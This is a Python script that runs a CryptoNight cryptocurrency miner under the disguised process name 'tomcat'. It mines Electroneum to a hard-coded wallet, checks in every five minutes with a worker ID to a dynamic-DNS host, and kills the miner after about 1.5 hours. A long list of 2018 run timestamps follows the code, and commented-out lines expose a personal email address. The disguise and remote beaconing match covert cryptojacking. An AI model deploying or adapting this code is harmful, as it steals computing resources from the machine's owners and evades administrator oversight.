import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:01.957512
#2018-02-17 16:55:06.146310
#2018-02-17 18:43:06.920555
#2018-02-17 20:31:02.227946
#2018-02-17 22:17:01.566144
#2018-02-18 00:01:06.162850
#2018-02-18 01:52:06.524257
#2018-02-18 03:40:07.461609
#2018-02-18 05:27:05.824723
#2018-02-18 07:19:01.929690
#2018-02-18 09:07:01.471560
#2018-02-18 10:53:06.038713
#2018-02-18 12:40:06.040187
#2018-02-18 14:27:06.112639
#2018-02-18 16:17:04.935251
#2018-02-18 18:06:05.268245
#2018-02-18 19:52:03.754877
#2018-02-18 21:38:04.279279
#2018-02-18 23:26:05.378477
#2018-02-19 01:13:04.871234
#2018-02-19 02:59:06.555109
#2018-02-19 04:47:01.795891
#2018-02-19 06:32:07.322988
#2018-02-19 08:20:10.034485
#2018-02-19 10:09:03.947001
#2018-02-19 11:58:01.332891
#2018-02-19 13:45:01.616939
#2018-02-19 15:33:05.808698
#2018-02-19 17:19:06.056137
#2018-02-19 19:06:01.613400
#2018-02-19 20:51:06.534858
#2018-02-19 22:38:05.382110
#2018-02-20 00:22:07.722540
#2018-02-20 02:10:04.705283
#2018-02-20 03:59:05.202996
#2018-02-20 05:43:06.380418
#2018-02-20 07:28:06.644069
#2018-02-20 09:13:04.010214
#2018-02-20 10:57:01.553400
#2018-02-20 12:44:06.378241
#2018-02-20 14:28:07.749572
#2018-02-20 16:12:04.815094
#2018-02-20 17:58:05.456450
#2018-02-20 19:49:06.788699
#2018-02-20 21:32:05.967972
#2018-02-20 23:14:06.131189
#2018-02-21 00:59:05.358816
#2018-02-21 02:46:05.916753
#2018-02-21 04:34:09.062706
#2018-02-21 06:22:01.753224
#2018-02-21 08:07:01.910950
#2018-02-21 09:53:04.265601
#2018-02-21 11:41:07.626291
#2018-02-21 13:31:03.958504
#2018-02-21 15:16:10.394793
#2018-02-21 17:07:07.129494
#2018-02-21 18:53:07.022599
#2018-02-21 20:40:01.382485
#2018-02-21 22:25:09.595721
#2018-02-22 00:14:01.511134
#2018-02-22 02:01:05.865528
#2018-02-22 03:47:01.582345
#2018-02-22 05:33:06.685589
#2018-02-22 07:18:06.181166
#2018-02-22 09:07:04.967150
#2018-02-22 10:55:06.945215
#2018-02-22 12:41:08.196222
#2018-02-22 14:28:02.183063
#2018-02-22 16:16:07.434986
#2018-02-22 18:03:01.989185
#2018-02-22 19:51:09.827527
#2018-02-22 21:40:03.900102
#2018-02-22 23:26:04.919284
#2018-02-23 01:12:08.522735
#2018-02-23 02:58:01.416224
#2018-02-23 04:44:06.609286
#2018-02-23 06:32:04.827461
#2018-02-23 08:21:07.709928
#2018-02-23 10:37:07.901266
#2018-02-23 12:29:01.812783
#2018-02-23 14:17:02.074779
#2018-02-23 16:09:08.289716
#2018-02-23 17:55:10.403799
#2018-02-23 19:42:05.666599
#2018-02-23 21:26:07.823623
#2018-02-23 23:16:01.671556
#2018-02-24 01:02:02.157869
#2018-02-24 02:54:03.411640
#2018-02-24 04:42:03.567663
#2018-02-24 06:26:01.448013
#2018-02-24 08:14:01.541977
#2018-02-24 09:58:07.869259
#2018-02-24 11:54:05.686257
#2018-02-24 13:44:07.768813
#2018-02-24 15:35:01.502759
#2018-02-24 18:19:01.738409
#2018-02-24 20:05:02.505415
#2018-02-24 21:48:07.774777
#2018-02-25 00:48:07.985031
#2018-02-25 04:32:03.884632
#2018-02-25 07:58:01.482036